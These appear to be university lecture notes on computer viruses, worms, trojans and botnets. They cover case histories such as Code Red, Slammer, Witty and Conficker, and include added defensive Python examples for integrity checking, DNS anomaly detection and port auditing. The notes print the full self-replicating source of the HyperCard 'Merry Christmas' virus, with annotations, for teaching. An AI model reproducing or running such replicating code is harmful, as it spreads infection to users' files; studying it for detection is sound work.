ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/
Prof. John A. Copeland, john.copeland@ece.gatech.edu, 404 894-5177, fax 404 894-0035
Office: Klaus 3362 (email or call for office visit, 404 894-5177)

Chapter 9b - Viruses and Worms
Computer Viruses (and other “Malicious Programs”)
Computer Viruses (and other “Malicious Programs”)

Computer “Viruses” and related programs have the ability to replicate themselves on an ever-increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet, by email or by sending packets to an open TCP/UDP port (a “Worm”). Peer-to-peer applications are open doors for worms (Napster, Kazaa, BitTorrent, eDonkey, ...).

Other “Malicious Programs” may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages (Spyware or Ad-ware). These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).
Definitions

Virus - code that copies itself into other programs. A “Bacteria” replicates until it fills all disk space, or all CPU cycles.
Payload - harmful things the malicious program does, after it has had time to spread.
Worm - a program that replicates itself across the network, usually riding on email messages or attached documents (e.g., macro viruses). Email “viruses” are technically “worms”.
Trojan Horse - instructions in an otherwise good program that cause bad things to happen (sending your data or password to an attacker over the net).
Logic Bomb - malicious code that activates on an event (e.g., a date).
Trap Door (or Back Door) - undocumented entry point written into code for debugging that can let unwanted users in.
“Vulnerability” - a program defect that permits “Intrusions”.
Easter Egg - extraneous code that does something “cool.” A way for programmers to show that they control the product.
Bot, BotNet - large network (hundreds to millions) of compromised computers that communicate to commit DDoS, SPAM, Phishing.
Taxonomy of Malicious Programs (diagram)

Need Host Program: Trapdoors, Logic Bombs, Trojan Horses, Viruses
Independent: Bacteria, Worms
Virus Phases

Dormant - waits for a trigger to start replicating.
Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for its own signature before infecting. Worms (like Melissa, Sobig.a-f, ...) spread as executable attachments to email; others spread by sending packets to open TCP or UDP ports.
Triggering - starts delivering the payload. Sometimes triggered on a certain date, or a certain time after infection.
Execution - the payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk clean. It may then start the first phase over again.
Virus Protection

Have a well-known virus protection program, configured to scan disks and downloads automatically for known viruses.
Use mail servers that screen for viruses and executable files.
Do not execute programs (or “macros”) from unknown sources (e.g., PS files, Hypercard files, MS Office documents, Java, ...), if you can help it.
Configure MS Word and Excel to not automatically execute macros in documents (reset the defaults).
Avoid the most common operating systems and email programs, if possible. Eudora will display HTML without danger (if set to not automatically include links from the Web).
Types of Viruses

Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.
Memory-resident Virus - lodges in main memory as part of the resident operating system.
Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses).
Stealth Virus - explicitly designed to hide from virus scanning programs.
Polymorphic Virus - mutates with every new host to prevent signature detection.
Macro Viruses

Microsoft Office applications allow “macros” to be part of the document. The macro could run whenever the document is opened, or when a certain command is selected (e.g., Save File). A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail-address lists.
ActiveX Controls

ActiveX Controls are reusable software components that are based on the Microsoft Component Object Model (COM). Microsoft later modified the Internet Explorer web browser to use them to incorporate applet-like functionality into Web pages. Because of that later use, ActiveX Controls have since been much derided in the mainstream and technical press for their ability to be used by unethical developers to create computer viruses, trojans and spyware infections.

ActiveX controls are unsafe for users of Internet Explorer (IE) who turn on the browser's ability to download and activate ActiveX controls within a Web page. The problems occur when a user surfs to a non-trusted web page and that web page contains a malicious ActiveX control. This is a very common means of distributing malware such as adware and spyware to unwitting users of Internet Explorer. (Adapted from Wikipedia.)

Using IE for reading HTML email from unknown sources is risky.
Trojan Subcategories

Clicker – Generates Web site traffic, the purpose of which is to generate revenue or to serve other malicious purposes.
Downloader – Downloads one or more malware components from a remote site and then installs them on the affected system.
Dropper – Drops and installs one or more malware components onto an affected system.
Exploit – Documents or media files containing exploit code.
Fraud Tool – Malware used to commit fraud. An example could be malware that displays fake errors or infection messages, which then incite the user to purchase fake tools or security software.
Generic – Trojans that do not fall within the other subcategories.
Infostealer – Spies on and/or steals information. Common tools include password stealers, keystroke loggers and spyware.
Proxy – Allows a remote attacker to relay connections via the affected system in order to hide their real origin.
Rootkit – Components used by other malware to hide themselves from the user and from security software.

From: http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report-graphics.zip
Historical

https://www.cert.org/stats/cert_stats.html
2011 - Weekly Reports (e.g., Feb. 14-20, 2011): http://www.us-cert.gov/cas/bulletins/SB11-052.html
Virus Detection

1st Generation, Scanners: searched files for any of a library of known virus “signatures.” Checked executable files for length changes.
2nd Generation, Heuristic Scanners: look for more general signs than specific signatures (code segments common to many viruses). Check files for checksum or hash changes.
3rd Generation, Activity Traps: stay resident in memory and look for certain patterns of software behavior (e.g., scanning files).
4th Generation, Full Featured: combine the best of the techniques above.
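The two file checks named above (1st generation length changes, 2nd generation hash changes), as an added Python example that is not part of the lecture notes. It builds a baseline of length and SHA-256 digest per executable, then re-scans; the file names and contents are constructed, and the scenario shows why the length check alone misses an in-place overwrite.

```python
"""Added example (not from the lecture slides): a 1st/2nd-generation style
integrity check. It records each executable's length and SHA-256 digest in a
baseline, then re-scans and reports files whose length changed (the classic
1st-generation check for appended virus code) and files whose content changed
while the length stayed the same (only the 2nd-generation hash check catches
an in-place overwrite). File names and contents below are constructed."""
import hashlib
import os
import tempfile


def fingerprint(path):
    """Return (length, sha256 hex digest) for one file."""
    h = hashlib.sha256()
    size = 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            size += len(chunk)
            h.update(chunk)
    return size, h.hexdigest()


def build_baseline(paths):
    """Map each path to its fingerprint; in practice the baseline must be kept
    where the scanned system cannot modify it (e.g. read-only media)."""
    return {p: fingerprint(p) for p in paths}


def check(baseline):
    """Compare current files against the baseline.
    Returns {path: 'length-changed' | 'content-changed' | 'missing'}."""
    findings = {}
    for path, (old_len, old_hash) in baseline.items():
        if not os.path.exists(path):
            findings[path] = "missing"
            continue
        new_len, new_hash = fingerprint(path)
        if new_len != old_len:
            findings[path] = "length-changed"      # 1st generation catches this
        elif new_hash != old_hash:
            findings[path] = "content-changed"     # only the hash catches this
    return findings


def demo():
    """Constructed scenario: three 'programs'; one gets code appended, one is
    overwritten in place with the same length, one is left alone."""
    d = tempfile.mkdtemp()
    paths = [os.path.join(d, n) for n in ("editor", "mailer", "shell")]
    for p in paths:
        with open(p, "wb") as f:
            f.write(b"\x7fELF" + b"\x00" * 60)      # fake 64-byte executable
    baseline = build_baseline(paths)
    with open(paths[0], "ab") as f:                 # parasitic append
        f.write(b"VIRUS")
    with open(paths[1], "r+b") as f:                # same-length overwrite
        f.seek(8)
        f.write(b"VIRUS")
    return {os.path.basename(p): v for p, v in check(baseline).items()}


if __name__ == "__main__":
    print(demo())   # {'editor': 'length-changed', 'mailer': 'content-changed'}
```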
Part of the “Merry Christmas” Macintosh Hypercard Virus

    on openbackground --merryxmas
      merryxmas "on openbackground --merryxmas"
    end openbackground

    on closebackground --merryxmas
      merryxmas "on closebackground --merryxmas"
    end closebackground

    on idle --merryxmas
      put "on idle --merryxmas" into key
      if not (the script of this stack contains key) then merryxmas key
    end idle

    on merryxmas key
      set lockscreen to true
      set lockmessages to true
      set lockrecent to true
      put the userlevel into oldlevel
      set the userlevel to 5
      put the script of this stack into stackscript
      put the script of stack "Home" into homescript
      put "on openbackground --merryxmas" into hostscript
      if stackscript contains key then
        if homescript contains key then
        else
          set cantmodify of stack "Home" to false
          if not (cantmodify of stack "Home") then
            set the script of stack "Home" to ¬
              homescript & return & lastlines(hostscript,stackscript)
          end if
        end if
      else
        if homescript contains key then
          set cantmodify of this stack to false
          if not (cantmodify of this stack) then
            set the script of this stack to ¬
              stackscript & return & lastlines(hostscript,homescript)
          end if
        else
          -- domenu "Quit Hypercard"
        end if
      end if
      set the userlevel to oldlevel
      set lockrecent to false
      set lockmessages to false
      set lockscreen to false
    end merryxmas

    function lastlines afterline,stuff
      put (number of lines in stuff) into total
      put line (total-53) to total of stuff into host
      repeat with x = 55 to total
        put line (total-x+1) of stuff & return & host into host
        if line 1 of host is afterline then exit repeat
      end repeat
      return host
    end lastlines

“merryxmas” is queued to run whenever any of 3 “events” occurs.
“lastlines” copies the virus code into the new stack.
The “key” was used to detect if a “stack” was already infected.

The payload was simply to display “Merry Christmas” on the screen on Dec. 25, but in practice it made the use of the Hypercard program excruciatingly slow. It would infect (and later check) every Hypercard document (“stack”) used, and the master script of the “Home” stack that Hypercard ran when started up.
W32/Swen.A Worm
added September 19, 2003 (http://www.cert.org/current/current_activity.html)

The CERT/CC has received reports of a new mass-emailing worm, referred to as "W32/Swen.A" or "W32/Gibe.F". This worm is similar to W32/Gibe.B in function. The worm has been reported to propagate through email, network shares, and file-sharing networks such as KaZaA and IRC. It arrives as an attachment. The subject, body, and From: address vary, but often claim to be a Microsoft Internet Explorer Update or a delivery failure notice from qmail. Upon opening the attachment, the worm attempts to mail itself to all e-mail addresses it finds on the system. Additionally, this worm attempts to terminate numerous security product processes on the system.

You may also wish to visit the CERT/CC's computer virus resources page, http://www.us-cert.org
W32/Sobig.F Worm
added August 19 | updated 8/25/2003 (http://www.cert.org/current/current_activity.html)

The CERT/CC continues to receive reports of a new variant of the Sobig worm, 'W32/Sobig.F'. Like its predecessors, Sobig.F attempts to replicate itself by sending out infected email. In addition, it can download and execute arbitrary code on the target machine, which potentially permits the worm to compromise confidential information, or set up and run other services, such as open mail relays. Please refer to CERT Incident Note IN-2003-03, "W32/Sobig.F Worm" for more information.

The CERT/CC is not aware of any continued activity related to the "second phase" of the worm's operation as described in the Incident Note, but encourages users who are still compromised to take action to recover their systems.
Worms Can Spread All Over in Minutes
(“How to Own the Internet in Your Spare Time,” Stuart Staniford, Vern Paxson, Nicholas Weaver)
Code Red Worm - Feb. 2001

Exploited vulnerability
The worm exploited a vulnerability in the indexing software distributed with IIS, described in MS01-033, for which a patch had been available a month earlier. The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated character 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine.

Worm payload
* It defaced the affected web site to display: HELLO! Welcome to http://www.worm.com! Hacked By Chinese! (The last sentence became a stock phrase to indicate an online defeat.)
* It tried to spread itself by looking for more IIS servers on the Internet.
* It waited 20-27 days after it was installed to launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[1]

[1] http://en.wikipedia.org/wiki/Code_Red_%28computer_worm%29
(“How to Own the Internet in Your Spare Time,” Stuart Staniford, Vern Paxson, Nicholas Weaver)
The Sapphire Worm Spread by UDP

The Sapphire/Slammer Worm spread by sending a single 404-byte UDP packet (376 data bytes). This meant that no reply was necessary from potential victims, and:
No pre-scanning of addresses to find valid targets was needed.
No TCP 3-way handshake was needed.
The source address could be spoofed, making identification of infected hosts hard.
Infected hosts could not be isolated by “ARP cache poisoning,” which only blocks replies.
from “The Spread of the Sapphire/Slammer Worm,” David Moore, Vern Paxson, et al.
Spread of the Sapphire/Slammer Worm (1/25/03), www.caida.org
Each circle represents the log of the number of infected hosts, 30 minutes after the start.
The Witty Worm: A New Chapter in Malware (extracts*)
Opinion by Bruce Schneier, Counterpane Internet Security Inc.
JUNE 02, 2004 (COMPUTERWORLD)

Witty was a big deal. It represented some scary malware firsts and is likely a harbinger of worms to come.

Witty was the first worm to target a particular set of security products -- in this case Internet Security Systems' BlackICE and RealSecure. It infected and destroyed only computers that had particular versions of this software running. 12,000 machines were the entire vulnerable and exposed population, and Witty infected them all -- worldwide -- in 45 minutes. It's the first worm that quickly corrupted a small population. Previous worms targeting small populations such as Scalper and Slapper were glacially slow.

Security company eEye Digital Security discovered the vulnerability in ISS's BlackICE/RealSecure products on March 8, and ISS released a patched version on March 9. eEye published a high-level description of the vulnerability on March 18. On the evening of March 19, about 36 hours after eEye's public disclosure, the Witty worm was released into the wild.

It was less than 700 bytes long. It used a random-number generator to spread itself, avoiding many of the problems that plagued previous worms. It spread by sending itself to random IP addresses with random destination ports, a trick that made it easier to sneak through firewalls.

Witty was released through a bot network of about 100 infected machines. Witty marks the first time we've seen a worm do it in the wild. This helped Witty infect every available host in 45 minutes.

* http://www.computerworld.com/securitytopics/security/virus/story/0,10801,93584,00.html
BotNet (e.g., Storm, Conficker; 2007-present)
[Diagram; labels: Spammer; Spammer's "phishing" Web site; Infected computers; Virus or Trojan; Web Traffic; Victim's PCs; Mail Servers]
http://en.wikipedia.org/wiki/Storm_botnet
“Network Telescope” operated by U. Calif. San Diego

The UCSD Network Telescope consists of a large piece of globally announced IPv4 address space. The telescope IP range contains almost no legitimate hosts, so inbound traffic to nonexistent machines is always anomalous in some way. Because the network telescope contains approximately 1/256th of all IPv4 addresses, it receives roughly one out of every 256 packets sent by an Internet worm with an unbiased random number generator. Because we are uniquely situated to receive traffic from every worm-infected host, we provide a global view of the spread of Internet worms.
http://www.caida.org/

Info on the Witty Worm: http://www.caida.org/research/security/witty/
Storm Botnet, 2007 - 2008

The botnet named Storm, because it initially spread in email about a storm in Europe, first showed up in 2006. It has gained notoriety through its writers' ability to update and adapt both the malware's code and the spam blasts that lure people into becoming infected with it. The sparse P2P network makes it difficult to track down the controllers or significantly damage the entire network.

GeoCities sites were infected with malicious JavaScript code that redirects the user's browser to secondary URLs hosted in Turkey. The Turkish URLs, meanwhile, try to persuade the user to download a new codec that's supposedly necessary to view images on the GeoCities sites. According to Trend Micro's analysis, the bogus codec (which claims to be for the 360-degree IPIX format) is actually an identity and information-stealing piece of malware. [PC World; Paul Ferguson, Trend Micro Inc, Nov. 2007]

Most threat watchers say no one knows who is behind Storm, but Finnish antivirus maker F-Secure, which takes credit for giving Storm its name, says a group called the Zhelatin Gang, which the company believes is operating out of Russia, is responsible. F-Secure also says that Storm is the largest botnet in the world with just more than 1 million infected PCs. [PC World, Sep. 2007]

In Sept. 2008, Microsoft Corp.'s anti-malware utility, the Malicious Software Removal Tool (MSRT), purged nearly 300,000 infected PCs of the infamous Storm Trojan horse [1].

[1] http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots?taxonomyId=17&pageNumber=1
The McColo Takedown (Nov. 2008)

The shutdown of a U.S.-based Web hosting company (McColo) crippled more than 500,000 bot-compromised computers ("Rustock" and "Srizbi"). They are no longer able to receive commands from criminals, since McColo hosted the command and control servers (URLs and IPs). ["Srizbi" later revived after the bots found a new controller located in Estonia.]

McColo was disconnected from the Internet by its upstream service providers at the urging of researchers who believed the company's servers hosted a staggering amount of cyber criminal activity, including the command-and-control servers of some of the planet's biggest botnets. Those collections of infected PCs were responsible for as much as 75% of the spam sent worldwide. When McColo went dark, spam volumes dropped by more than 40% in a matter of hours.
http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots
Conficker (Conflicker, Downadup, Kido) Bot, Nov. 2008-2010+

On October 23, 2008, Microsoft announced a security update that resolved a critical vulnerability in the Windows Server service (MS08-067). The CAIDA network telescope observes a significant fraction of the random scans.

We [CAIDA] know that the Conficker software generates a set of ~250 new domain name strings per day, which it later contacts using an HTTP request on TCP/80 [looking for a controller]. This feature implies that Conficker is a worm designed to become a botnet commanded by whoever subsequently registers the quasi-randomly generated set of domain names. This feature also gives analysts a mechanism to collect information on worm spread, by registering one or more of these domains and recording HTTP server logs.[1]

From late Nov. through Dec. 2008 [SRI] recorded more than 13,000 Conficker infections within their honeynet, and surveyed more than 1.5 million infected IP addresses from 206 countries. Their cumulative census of Conficker.A indicates that it has affected more than 4.7 million IP addresses, while its successor, Conficker.B, has affected 6.7M IP addresses. We [SRI] have not seen such a dominating infection outbreak since Sasser in 2004. Nor have we seen such a broad spectrum of antivirus tools do such a consistently poor job at detecting malware binary variants since the Storm outbreak of 2007.[2]

[1] http://www.caida.org/research/security/ms08-067/conficker.xml
[2] http://mtc.sri.com/Conficker/
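A defender-side view of the ~250 generated domains per day described above, as an added Python example that is not from the slides or from CAIDA/SRI. It flags hosts that query an unusually large number of distinct names in a day where most lookups fail; the DNS log format, hosts and domain names are constructed, the thresholds are assumptions, and the NXDOMAIN heuristic rests on the assumption (not stated on the slide) that most generated names are never registered.

```python
"""Added example (not from the slides or from CAIDA/SRI): flag hosts whose
DNS behaviour looks like Conficker's, i.e. a few hundred distinct, mostly
unresolvable domains per day. The log format and all hosts/domains are
constructed; the NXDOMAIN heuristic assumes most generated names are
unregistered, which the slide does not state."""
from collections import defaultdict
import random

DISTINCT_PER_DAY = 150   # Conficker contacted ~250/day; this threshold is an assumption
NXDOMAIN_RATIO = 0.8     # assumed: most generated names do not resolve


def parse(line):
    """Parse 'timestamp client domain rcode' into (day, client, domain, rcode);
    malformed lines return None so one bad line does not abort the run."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, domain, rcode = parts
    return ts[:10], client, domain.lower().rstrip("."), rcode


def suspicious_hosts(lines, min_distinct=DISTINCT_PER_DAY, min_nx=NXDOMAIN_RATIO):
    """Return {(day, client): (distinct_domains, nxdomain_ratio)} for hosts
    exceeding both thresholds on the same day."""
    domains = defaultdict(set)
    nx = defaultdict(int)
    total = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        day, client, domain, rcode = rec
        key = (day, client)
        domains[key].add(domain)
        total[key] += 1
        if rcode == "NXDOMAIN":
            nx[key] += 1
    flagged = {}
    for key, doms in domains.items():
        ratio = nx[key] / total[key]
        if len(doms) >= min_distinct and ratio >= min_nx:
            flagged[key] = (len(doms), round(ratio, 2))
    return flagged


def constructed_log():
    """One constructed day of DNS log lines: an infected host (10.0.0.5) querying
    250 pseudo-random names, and an ordinary host (10.0.0.9) re-visiting three sites."""
    rng = random.Random(1)
    lines = []
    for i in range(250):
        name = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz")
                       for _ in range(rng.randint(5, 10)))
        tld = rng.choice(["com", "net", "org", "info", "biz"])
        rcode = "NOERROR" if i % 25 == 0 else "NXDOMAIN"   # a few names happen to resolve
        lines.append(f"2008-11-25T{i // 11:02d}:{i % 60:02d}:00 10.0.0.5 {name}.{tld} {rcode}")
    for i in range(300):
        site = ["example.com", "example.net", "example.org"][i % 3]
        lines.append(f"2008-11-25T{i // 13:02d}:{i % 60:02d}:00 10.0.0.9 {site} NOERROR")
    return lines


if __name__ == "__main__":
    print(suspicious_hosts(constructed_log()))
```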
Conficker TCP port 445 Scanning (to 1/240 of all IP addresses)

We [CAIDA] started recording TCP/445 scanning to the UCSD Network Telescope on October 23, 2008, at which point we saw about 1000-2000 unique source IP addresses per hour scanning TCP/445. Before November 21 we saw up to 3222 unique source IP addresses per hour scanning TCP/445. After November 21 midnight UTC we saw a significant increase in source IP addresses that scan on TCP/445, which has remained high ever since. [TCP port 445 is the Windows Server port]
http://www.caida.org/research/security/ms08-067/conficker.xml
Detecting Open Ports on a UNIX Host

    root# netstat -na -A inet        (or “-f inet”)
    Active Internet connections (including servers)
    Proto RQ SQ  Local Address        Foreign Address      (state)
    tcp4   0  0  127.0.0.1.1033       127.0.0.1.735        ESTABLISHED
    tcp4   0  0  127.0.0.1.735        127.0.0.1.1033       ESTABLISHED
    tcp4   0  0  *.22                 *.*                  LISTEN
    tcp4   0  0  *.*                  *.*                  CLOSED
    tcp4   0  0  127.0.0.1.50530      127.0.0.1.631        CLOSE_WAIT
    tcp4   0  0  127.0.0.1.50529      127.0.0.1.631        CLOSE_WAIT
    tcp4   0  0  127.0.0.1.631        *.*                  LISTEN
    tcp4   0  0  *.*                  *.*                  CLOSED
    tcp4   0  0  127.0.0.1.1033       127.0.0.1.1019       ESTABLISHED
    tcp4   0  0  127.0.0.1.1019       127.0.0.1.1033       ESTABLISHED
    tcp4   0  0  127.0.0.1.1033       *.*                  LISTEN
    tcp4   0  0  *.27374              *.*                  LISTEN
    udp4   0  0  *.*                  *.*                  LISTEN

“netstat -na -A inet” (or “netstat -nao -A inet”) will show open ports on a UNIX system. The local address “127.0.0.1” is the internal loopback address and is not a problem. Here two ports are open for any (*) outside connections: TCP port 22 (SSH - good) and TCP port 27374 (Sub-7 Trojan Horse - bad). The tcp4 *.* and udp4 *.* indicate promiscuous listening (any IP: any port). The “tcp4 *.*” is not good if you are not knowingly running a sniffer. The “udp4 *.*” may just be the OS listening for broadcast messages.
“ifconfig” can Detect if a Port is Listening to All Packets in Promiscuous (PROMISC) Mode

    root# ifconfig en0
    en0: flags=8863<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.1.132 netmask 0xffffff00 broadcast 192.168.1.255
        ether 00:03:93:80:24:68
        media: autoselect (10baseT/UTP <half-duplex>) status: active
        supported media: none autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex>

After starting a sniffing program like “tcpdump” or a sniffing Trojan Horse:

    root# ifconfig en0
    en0: flags=8863<UP,BROADCAST,PROMISC,RUNNING,MULTICAST> mtu 1500
        inet 192.168.1.132 netmask 0xffffff00 broadcast 192.168.1.255
        ether 00:03:93:80:24:68
        media: autoselect (10baseT/UTP <half-duplex>) status: active
        supported media: none autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP

On Windows: in "Command Prompt" try "ipconfig"
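The two host checks on these last two slides (wildcard listeners in netstat, PROMISC in ifconfig), as an added Python example that is not part of the lecture notes. The netstat and ifconfig samples are abridged copies of the slides' output; the allowlist (only TCP 22 expected) is an assumption for the sake of the example.

```python
"""Added example (not from the slides): audit the netstat and ifconfig output
shown on the two preceding slides. Listening sockets bound to a wildcard
address are compared with an allowlist of ports the administrator expects
(here only 22, an assumption), loopback-only listeners are ignored, and the
ifconfig flags field is checked for PROMISC. The samples are abridged copies
of the slides' output; the allowlist is constructed."""
import re

NETSTAT_SAMPLE = """\
Proto RQ SQ Local Address Foreign Address (state)
tcp4 0 0 127.0.0.1.1033 127.0.0.1.735 ESTABLISHED
tcp4 0 0 *.22 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 127.0.0.1.631 *.* LISTEN
tcp4 0 0 127.0.0.1.1033 *.* LISTEN
tcp4 0 0 *.27374 *.* LISTEN
udp4 0 0 *.* *.* LISTEN
"""
IFCONFIG_SAMPLE = "en0: flags=8863<UP,BROADCAST,PROMISC,RUNNING,MULTICAST> mtu 1500"


def split_addr(addr):
    """BSD netstat prints host.port with a dot separator; either part may be '*'."""
    host, _, port = addr.rpartition(".")
    return host, port


def audit_netstat(text, allowed_ports=("22",)):
    """Return [(proto, local address, verdict)] for sockets that need a look:
    wildcard listeners not in the allowlist, and *.* promiscuous sockets."""
    findings = []
    for line in text.splitlines()[1:]:          # skip the header line
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, local, state = fields[0], fields[3], fields[-1]
        host, port = split_addr(local)
        if host == "127.0.0.1":
            continue                            # loopback only: not reachable from outside
        if port == "*":
            findings.append((proto, local, "promiscuous listener (any IP: any port)"))
        elif state == "LISTEN" and port not in allowed_ports:
            findings.append((proto, local, "unexpected open port"))
    return findings


def promiscuous_interfaces(text):
    """Return the names of interfaces whose flags field contains PROMISC."""
    return re.findall(r"^(\S+): flags=\d+<[^>]*\bPROMISC\b[^>]*>", text, re.M)


if __name__ == "__main__":
    for finding in audit_netstat(NETSTAT_SAMPLE):
        print(*finding)
    print("promiscuous:", promiscuous_interfaces(IFCONFIG_SAMPLE))
```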